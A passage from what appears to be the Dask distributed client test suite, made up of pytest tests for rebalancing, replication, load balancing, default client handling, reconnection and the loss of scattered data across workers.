xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
await asyncio.sleep(0.5)
result = await c.gather(c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False))
assert result[0] == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
with cluster() as (s, [a, b]):
proc = psutil.Process()
with Client(s["address"], loop=loop) as c: # first client to start loop
before = proc.num_fds() # measure
for i in range(4):
with Client(s["address"], loop=loop): # start more clients
pass
start = time()
while proc.num_fds() > before:
sleep(0.01)
assert time() < start + 10, (before, proc.num_fds())
@gen_cluster()
async def test_startup_close_startup(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c = await Client(s.address, asynchronous=True)
await c.close()
def test_startup_close_startup_sync(loop):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
sleep(0.1)
with Client(s["address"]) as c:
pass
with Client(s["address"]) as c:
pass
sleep(0.1)
with Client(s["address"]) as c:
pass
@gen_cluster(client=True)
async def test_badly_serialized_exceptions(c, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException("hello world")
x = c.submit(f)
with pytest.raises(Exception, match="hello world"):
await x
# Set rebalance() to work predictably on small amounts of managed memory. By default, it
# uses optimistic memory, which would only be possible to test by allocating very large
# amounts of managed memory, so that they would hide variations in unmanaged memory.
REBALANCE_MANAGED_CONFIG = {
"distributed.worker.memory.rebalance.measure": "managed",
"distributed.worker.memory.rebalance.sender-min": 0,
"distributed.worker.memory.rebalance.sender-recipient-gap": 0,
}
@gen_cluster(client=True, config=REBALANCE_MANAGED_CONFIG)
async def test_rebalance(c, s, a, b):
"""Test Client.rebalance(). These are just to test the Client wrapper around
Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
"""
futures = await c.scatter(range(100), workers=[a.address])
assert len(a.data) == 100
assert len(b.data) == 0
await c.rebalance()
assert len(a.data) == 50
assert len(b.data) == 50
@gen_cluster(nthreads=[("", 1)] * 3, client=True, config=REBALANCE_MANAGED_CONFIG)
async def test_rebalance_workers_and_keys(client, s, a, b, c):
"""Test Client.rebalance(). These are just to test the Client wrapper around
Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
"""
futures = await client.scatter(range(100), workers=[a.address])
assert (len(a.data), len(b.data), len(c.data)) == (100, 0, 0)
# Passing empty iterables is not the same as omitting the arguments
await client.rebalance([])
await client.rebalance(workers=[])
assert (len(a.data), len(b.data), len(c.data)) == (100, 0, 0)
# Limit rebalancing to two arbitrary keys and two arbitrary workers.
await client.rebalance([futures[3], futures[7]], [a.address, b.address])
assert (len(a.data), len(b.data), len(c.data)) == (98, 2, 0)
with pytest.raises(KeyError):
await client.rebalance(workers=["notexist"])
def test_rebalance_sync():
with dask.config.set(REBALANCE_MANAGED_CONFIG):
with Client(n_workers=2, processes=False, dashboard_address=":0") as c:
s = c.cluster.scheduler
a = c.cluster.workers[0]
b = c.cluster.workers[1]
futures = c.scatter(range(100), workers=[a.address])
assert len(a.data) == 100
assert len(b.data) == 0
c.rebalance()
assert len(a.data) == 50
assert len(b.data) == 50
@gen_cluster(client=True)
async def test_rebalance_unprepared(c, s, a, b):
"""Client.rebalance() internally waits for unfinished futures"""
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
# Let the futures reach the scheduler
await asyncio.sleep(0.1)
# We didn't wait enough for futures to complete. However, Client.rebalance() will
# block until all futures are completed before invoking Scheduler.rebalance().
await c.rebalance(futures)
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_raises_on_explicit_missing_data(c, s, a, b):
"""rebalance() raises KeyError if explicitly listed futures disappear"""
f = Future("x", client=c, state="memory")
with pytest.raises(KeyError, match="Could not rebalance keys:"):
await c.rebalance(futures=[f])
@gen_cluster(client=True)
async def test_receive_lost_key(c, s, a, b):
x = c.submit(inc, 1, workers=[a.address])
await x
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_unrunnable_task_runs(c, s, a, b):
x = c.submit(inc, 1, workers=[a.ip])
await x
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
assert s.tasks[x.key] in s.unrunnable
assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}
w = await Worker(s.address, loop=s.loop)
while x.status != "finished":
await asyncio.sleep(0.01)
assert s.tasks[x.key] not in s.unrunnable
result = await x
assert result == 2
await w.close()
@gen_cluster(client=True, nthreads=[])
async def test_add_worker_after_tasks(c, s):
futures = c.map(inc, range(10))
n = await Nanny(s.address, nthreads=2, loop=s.loop)
await c.gather(futures)
await n.close()
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_workers_register_indirect_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, x, workers=b.ip)
await y
assert b.data[x.key] == 1
assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
s.validate_state()
@gen_cluster(client=True)
async def test_submit_on_cancelled_future(c, s, a, b):
x = c.submit(inc, 1)
await x
await c.cancel(x)
with pytest.raises(CancelledError):
c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate(c, s, *workers):
[a, b] = await c.scatter([1, 2])
await s.replicate(keys=[a.key, b.key], n=5)
s.validate_state()
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
async def test_replicate_tuple_keys(c, s, a, b):
x = delayed(inc)(1, dask_key_name=("x", 1))
f = c.persist(x)
await c.replicate(f, n=5)
s.validate_state()
assert a.data and b.data
await c.rebalance(f)
s.validate_state()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_workers(c, s, *workers):
[a, b] = await c.scatter([1, 2], workers=[workers[0].address])
await s.replicate(
keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
)
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
await s.replicate(keys=[a.key, b.key], n=1)
assert len(s.tasks[a.key].who_has) == 1
assert len(s.tasks[b.key].who_has) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate_state()
await s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.tasks[a.key].who_has) == 10
assert len(s.tasks[b.key].who_has) == 10
s.validate_state()
await s.replicate(
keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
)
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
s.validate_state()
class CountSerialization:
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_tree_branching(c, s, *workers):
obj = CountSerialization()
[future] = await c.scatter([obj])
await s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_client_replicate(c, s, *workers):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
await c.replicate([x, y], n=5)
assert len(s.tasks[x.key].who_has) == 5
assert len(s.tasks[y.key].who_has) == 5
await c.replicate([x, y], n=3)
assert len(s.tasks[x.key].who_has) == 3
assert len(s.tasks[y.key].who_has) == 3
await c.replicate([x, y])
s.validate_state()
assert len(s.tasks[x.key].who_has) == 10
assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
)
async def test_client_replicate_host(client, s, a, b, c):
aws = s.workers[a.address]
bws = s.workers[b.address]
cws = s.workers[c.address]
x = client.submit(inc, 1, workers="127.0.0.2")
await wait([x])
assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}
await client.replicate([x], workers=["127.0.0.2"])
assert s.tasks[x.key].who_has == {bws, cws}
await client.replicate([x], workers=["127.0.0.1"])
assert s.tasks[x.key].who_has == {aws, bws, cws}
def test_client_replicate_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
c.replicate([x, y], n=2)
who_has = c.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
c.replicate([x], n=0)
assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
async def test_task_load_adapts_quickly(c, s, a):
future = c.submit(slowinc, 1, delay=0.2) # slow
await wait(future)
assert 0.15 < s.task_prefixes["slowinc"].duration_average < 0.4
futures = c.map(slowinc, range(10), delay=0) # very fast
await wait(futures)
assert 0 < s.task_prefixes["slowinc"].duration_average < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_after_fast_functions(c, s, a, b):
x = c.submit(inc, 1, workers=a.address) # very fast
y = c.submit(inc, 2, workers=b.address) # very fast
await wait([x, y])
futures = c.map(inc, range(2, 11))
await wait(futures)
assert any(f.key in a.data for f in futures)
assert any(f.key in b.data for f in futures)
# assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_on_startup(c, s, a, b):
x, y = c.map(inc, [1, 2])
await wait([x, y])
assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_contiguous_load(c, s, a, b):
w, x, y, z = c.map(inc, [1, 2, 3, 4])
await wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit(c, s, *workers):
L = [c.submit(slowinc, i) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit_and_resident_data(c, s, *workers):
[x] = await c.scatter([10], broadcast=True)
L = [c.submit(slowinc, x, pure=False) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(slowinc, range(100), delay=delay)
futures = c.map(slowinc, futures, delay=delay / 10)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores_random(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(randominc, range(100), scale=0.1)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_cancel_clears_processing(c, s, *workers):
da = pytest.importorskip("dask.array")
x = c.submit(slowinc, 1, delay=0.2)
while not s.tasks:
await asyncio.sleep(0.01)
await c.cancel(x)
while any(v for w in s.workers.values() for v in w.processing):
await asyncio.sleep(0.01)
s.validate_state()
def test_default_get():
with cluster() as (s, [a, b]):
pre_get = dask.base.get_scheduler()
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"], set_as_default=True) as c:
assert dask.base.get_scheduler() == c.get
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c = Client(s["address"], set_as_default=False)
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c.close()
c = Client(s["address"], set_as_default=True)
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == c.get
c.close()
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"]) as c:
assert dask.base.get_scheduler() == c.get
with Client(s["address"], set_as_default=False) as c:
assert dask.base.get_scheduler() != c.get
assert dask.base.get_scheduler() != c.get
with Client(s["address"], set_as_default=True) as c1:
assert dask.base.get_scheduler() == c1.get
with Client(s["address"], set_as_default=True) as c2:
assert dask.base.get_scheduler() == c2.get
assert dask.base.get_scheduler() == c1.get
assert dask.base.get_scheduler() == pre_get
@gen_cluster(client=True)
async def test_ensure_default_client(c, s, a, b):
assert c is default_client()
async with Client(s.address, set_as_default=False, asynchronous=True) as c2:
assert c is default_client()
assert c2 is not default_client()
ensure_default_client(c2)
assert c is not default_client()
assert c2 is default_client()
def test_ensure_default_get_deprecated():
with pytest.warns(FutureWarning, match="`ensure_default_get` is deprecated"):
from distributed.client import ensure_default_get
assert ensure_default_get is ensure_default_client
@gen_cluster()
async def test_set_as_default(s, a, b):
with pytest.raises(ValueError):
default_client()
async with Client(s.address, set_as_default=False, asynchronous=True) as c1:
with pytest.raises(ValueError):
default_client()
async with Client(s.address, set_as_default=True, asynchronous=True) as c2:
assert default_client() is c2
async with Client(s.address, set_as_default=True, asynchronous=True) as c3:
assert default_client() is c3
async with Client(
s.address, set_as_default=False, asynchronous=True
) as c4:
assert default_client() is c3
await c4.scheduler_comm.close()
while c4.status != "running":
await asyncio.sleep(0.01)
assert default_client() is c3
with pytest.raises(ValueError):
default_client()
@gen_cluster(client=True)
async def test_get_processing(c, s, a, b):
processing = await c.processing()
assert processing == valmap(tuple, s.processing)
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
)
await asyncio.sleep(0.2)
x = await c.processing()
assert set(x) == {a.address, b.address}
x = await c.processing(workers=[a.address])
assert isinstance(x[a.address], (list, tuple))
@gen_cluster(client=True)
async def test_get_foo(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
x = await c.scheduler.ncores()
assert x == s.nthreads
x = await c.scheduler.ncores(workers=[a.address])
assert x == {a.address: s.nthreads[a.address]}
x = await c.scheduler.has_what()
assert valmap(sorted, x) == valmap(sorted, s.has_what)
x = await c.scheduler.has_what(workers=[a.address])
assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}
x = await c.scheduler.nbytes(summary=False)
assert x == s.get_nbytes(summary=False)
x = await c.scheduler.nbytes(keys=[futures[0].key], summary=False)
assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}
x = await c.scheduler.who_has()
assert valmap(sorted, x) == valmap(sorted, s.who_has)
x = await c.scheduler.who_has(keys=[futures[0].key])
assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
def assert_dict_key_equal(expected, actual):
assert set(expected.keys()) == set(actual.keys())
for k in actual.keys():
ev = expected[k]
av = actual[k]
assert list(ev) == list(av)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_get_foo_lost_keys(c, s, u, v, w):
x = c.submit(inc, 1, workers=[u.address])
y = await c.scatter(3, workers=[v.address])
await wait([x, y])
ua, va, wa = u.address, v.address, w.address
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
await u.close()
await v.close()
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [], va: []})
# The scattered key cannot be recomputed so it is forgotten
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: []})
# ... but when passed explicitly, it is included in the result
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
client=True, Worker=Nanny, clean_kwargs={"threads": False, "processes": False}
)
async def test_bad_tasks_fail(c, s, a, b):
f = c.submit(sys.exit, 0)
with captured_logger(logging.getLogger("distributed.scheduler")) as logger:
with pytest.raises(KilledWorker) as info:
await f
text = logger.getvalue()
assert f.key in text
assert info.value.last_worker.nanny in {a.address, b.address}
await asyncio.gather(a.close(), b.close())
def test_get_processing_sync(c, s, a, b):
processing = c.processing()
assert not any(v for v in processing.values())
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
)
sleep(0.2)
aa = a["address"]
bb = b["address"]
processing = c.processing()
assert set(c.processing(aa)) == {aa}
assert set(c.processing([aa])) == {aa}
c.cancel(futures)
def test_close_idempotent(c):
c.close()
c.close()
c.close()
@nodebug
def test_get_returns_early(c):
start = time()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
assert time() < start + 0.5
# Futures should be released and forgotten
wait_for(lambda: not c.futures, timeout=0.1)
wait_for(lambda: not any(c.processing().values()), timeout=3)
x = c.submit(inc, 1)
x.result()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True, timeout=60)
async def test_Client_clears_references_after_restart(c, s, a, b):
x = c.submit(inc, 1)
assert x.key in c.refcount
await c.restart()
assert x.key not in c.refcount
key = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert key not in c.refcount
@gen_cluster(Worker=Nanny, client=True)
async def test_restart_timeout_is_logged(c, s, a, b):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await c.restart(timeout="0.5s")
text = logger.getvalue()
assert "Restart timed out after 0.50 seconds" in text
def test_get_stops_work_after_error(c):
with pytest.raises(RuntimeError):
c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])
start = time()
while any(c.processing().values()):
sleep(0.01)
assert time() < start + 0.5
def test_as_completed_list(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq))
assert set(c.gather(seq2)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq, with_results=True))
assert set(pluck(1, seq2)) == {1, 2, 3, 4, 5}
assert set(pluck(0, seq2)) == set(seq)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
n = 50
futures = c.map(slowinc, range(n), delay=0.01)
out = []
for batch in as_completed(futures, with_results=with_results).batches():
assert isinstance(batch, (tuple, list))
sleep(0.05)
out.extend(batch)
assert len(out) == n
if with_results:
assert set(pluck(1, out)) == set(range(1, n + 1))
else:
assert set(out) == set(futures)
def test_as_completed_next_batch(c):
futures = c.map(slowinc, range(2), delay=0.1)
ac = as_completed(futures)
assert not ac.is_empty()
assert ac.next_batch(block=False) == []
assert set(ac.next_batch(block=True)).issubset(futures)
while not ac.is_empty():
assert set(ac.next_batch(block=True)).issubset(futures)
assert ac.is_empty()
assert not ac.has_ready()
@gen_cluster(nthreads=[])
async def test_status(s):
c = await Client(s.address, asynchronous=True)
assert c.status == "running"
x = c.submit(inc, 1)
await c.close()
assert c.status == "closed"
@gen_cluster(client=True)
async def test_async_whowhat(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
who_has = await c.who_has()
has_what = await c.has_what()
assert type(who_has) is WhoHas
assert type(has_what) is HasWhat
assert who_has == {x.key: (a.address,)}
assert has_what == {a.address: (x.key,), b.address: ()}
def test_client_repr_html(c):
x = c.submit(inc, 1)
who_has = c.who_has()
has_what = c.has_what()
assert type(who_has) is WhoHas
assert type(has_what) is HasWhat
@gen_cluster(client=True)
async def test_persist_optimize_graph(c, s, a, b):
i = 10
for method in [c.persist, c.compute]:
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=False)
await wait(b4)
assert set(map(stringify, b3.__dask_keys__())).issubset(s.tasks)
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=True)
await wait(b4)
assert not any(stringify(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
async def test_scatter_raises_if_no_workers(c, s):
with pytest.raises(TimeoutError):
await c.scatter(1, timeout=0.5)
@pytest.mark.slow
def test_reconnect(loop):
w = Worker("127.0.0.1", 9393, loop=loop)
loop.add_callback(w.start)
scheduler_cli = [
"dask-scheduler",
"--host",
"127.0.0.1",
"--port",
"9393",
"--no-dashboard",
]
with popen(scheduler_cli):
c = Client("127.0.0.1:9393", loop=loop)
c.wait_for_workers(1, timeout=10)
x = c.submit(inc, 1)
assert x.result(timeout=10) == 2
start = time()
while c.status != "connecting":
assert time() < start + 10
sleep(0.01)
assert x.status == "cancelled"
with pytest.raises(CancelledError):
x.result(timeout=10)
with popen(scheduler_cli):
start = time()
while c.status != "running":
sleep(0.1)
assert time() < start + 10
start = time()
while len(c.nthreads()) != 1:
sleep(0.05)
assert time() < start + 10
x = c.submit(inc, 1)
assert x.result(timeout=10) == 2
start = time()
while True:
assert time() < start + 10
try:
x.result(timeout=10)
assert False
except CommClosedError:
continue
except CancelledError:
break
sync(loop, w.close, timeout=1)
c.close()
class UnhandledException(Exception):
pass
@contextmanager
def catch_unhandled_exceptions() -> Generator[None, None, None]:
loop = asyncio.get_running_loop()
ctx: dict[str, Any] | None = None
old_handler = loop.get_exception_handler()
@loop.set_exception_handler
def _(loop: object, context: dict[str, Any]) -> None:
nonlocal ctx
ctx = context
try:
yield
finally:
loop.set_exception_handler(old_handler)
if ctx:
raise UnhandledException(ctx["message"]) from ctx.get("exception")
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
async def test_reconnect_timeout(c, s):
with catch_unhandled_exceptions(), captured_logger(
logging.getLogger("distributed.client")
) as logger:
await s.close()
while c.status != "closed":
await c._update_scheduler_info()
await asyncio.sleep(0.05)
text = logger.getvalue()
assert "Failed to reconnect" in text
@pytest.mark.avoid_ci(reason="hangs on github actions ubuntu-latest CI")
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
proc = psutil.Process()
with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
gc.collect()
before = proc.num_fds()
done = Semaphore(0)
running = weakref.WeakKeyDictionary()
workers = set()
status = True
async def start_worker(sleep, duration, repeat=1):
for i in range(repeat):
await asyncio.sleep(sleep)
if not status:
return
w = worker(s["address"], loop=loop)
running[w] = None
await w
workers.add(w)
addr = w.worker_address
running[w] = addr
await asyncio.sleep(duration)
await w.close()
del w
await asyncio.sleep(0)
done.release()
for i in range(count):
loop.add_callback(
start_worker, random.random() / 5, random.random() / 5, repeat=repeat
)
with Client(s["address"], loop=loop) as c:
sleep(1)
for i in range(count):
done.acquire(timeout=5)
gc.collect()
if not running:
break
start = time()
while c.nthreads():
sleep(0.2)
assert time() < start + 10
while len(workers) < count * repeat:
sleep(0.2)
status = False
[c.sync(w.close) for w in list(workers)]
for w in workers:
assert w.status == Status.closed
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
sleep(0.1)
if time() > start + 10:
if worker == Worker: # this is an esoteric case
print("File descriptors did not clean up")
break
else:
raise ValueError("File descriptors did not clean up")
@gen_cluster()
async def test_idempotence(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
# Submit
x = c.submit(inc, 1)
await x
log = list(s.transition_log)
len_single_submit = len(log) # see last assert
y = f.submit(inc, 1)
assert x.key == y.key
await y
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
# Error
a = c.submit(div, 1, 0)
await wait(a)
assert a.status == "error"
log = list(s.transition_log)
b = f.submit(div, 1, 0)
assert a.key == b.key
await wait(b)
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
s.transition_log.clear()
# Simultaneous Submit
d = c.submit(inc, 2)
e = c.submit(inc, 2)
await wait([d, e])
assert len(s.transition_log) == len_single_submit
await c.close()
await f.close()
def test_scheduler_info(c):
info = c.scheduler_info()
assert isinstance(info, dict)
assert len(info["workers"]) == 2
assert isinstance(info["started"], float)
def test_write_scheduler_file(c):
info = c.scheduler_info()
with tmpfile("json") as scheduler_file:
c.write_scheduler_file(scheduler_file)
with Client(scheduler_file=scheduler_file) as c2:
info2 = c2.scheduler_info()
assert c.scheduler.address == c2.scheduler.address
# test that a ValueError is raised if the scheduler_file
# attribute is already set
with pytest.raises(ValueError):
c.write_scheduler_file(scheduler_file)
def test_get_versions_sync(c):
requests = pytest.importorskip("requests")
v = c.get_versions()
assert v["scheduler"] is not None
assert v["client"] is not None
assert len(v["workers"]) == 2
for k, v in v["workers"].items():
assert v is not None
c.get_versions(check=True)
# smoke test for versions
# that this does not raise
v = c.get_versions(packages=["requests"])
assert v["client"]["packages"]["requests"] == requests.__version__
@gen_cluster(client=True)
async def test_get_versions_async(c, s, a, b):
v = await c.get_versions(check=True)
assert v.keys() == {"scheduler", "client", "workers"}
@gen_cluster(client=True, config={"distributed.comm.timeouts.connect": "200ms"})
async def test_get_versions_rpc_error(c, s, a, b):
a.stop()
v = await c.get_versions()
assert v.keys() == {"scheduler", "client", "workers"}
assert v["workers"].keys() == {b.address}
def test_threaded_get_within_distributed(c):
import dask.multiprocessing
for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
def f():
return get({"x": (lambda: 1,)}, "x")
future = c.submit(f)
assert future.result() == 1
@gen_cluster(client=True)
async def test_lose_scattered_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "cancelled"
assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_partially_lose_scattered_data(e, s, a, b, c):
x = await e.scatter(1, workers=a.address)
await e.replicate(x, n=2)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "finished"
assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
async def test_scatter_compute_lose(c, s, a, b):
[x] = await c.scatter([[1, 2, 3, 4]], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
z = c.submit(slowadd, x, y, delay=0.2)
await asyncio.sleep(0.1)
await a.close()
with pytest.raises(CancelledError):
await wait(z)
assert x.status == "cancelled"
assert y.status == "finished"
assert z.status == "cancelled"
@gen_cluster(client=True)
async def test_scatter_compute_store_lose(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
x = await c.scatter(1, workers=a.address)
xx = c.submit(inc, x, workers=a.address)
y = c.submit(inc, 1)
z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
await wait(z)
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
# assert xx.status == 'finished'
assert y.status == "finished"
assert z.status == "finished"
zz = c.submit(inc, z)
await wait(zz)
zkey = z.key
del z
while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
await asyncio.sleep(0.01)
xxkey = xx.key
del xx
while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
await asyncio.sleep(0.01)
@gen_cluster(client=True)
async def test_scatter_compute_store_lose_processing(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
[x] = await c.scatter([1], workers=a.address)
y = c.submit(slowinc, x, delay=0.2)
z = c.submit(inc, y)
await asyncio.sleep(0.1)
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
assert y.status == "cancelled"
assert z.status == "cancelled"
@gen_cluster()
async def test_serialize_future(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(lambda: 1)
result = await future
for ci in (c1, c2):
for ctxman in ci.as_current, lambda: temp_default_client(ci):
with ctxman():
future2 = pickle.loads(pickle.dumps(future))
assert future2.client is ci
assert stringify(future2.key) in ci.futures
result2 = await future2
assert result == result2
await c1.close()
await c2.close()
@gen_cluster()
async def test_temp_default_client(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c1):
assert default_client() is c1
assert default_client(c2) is c2
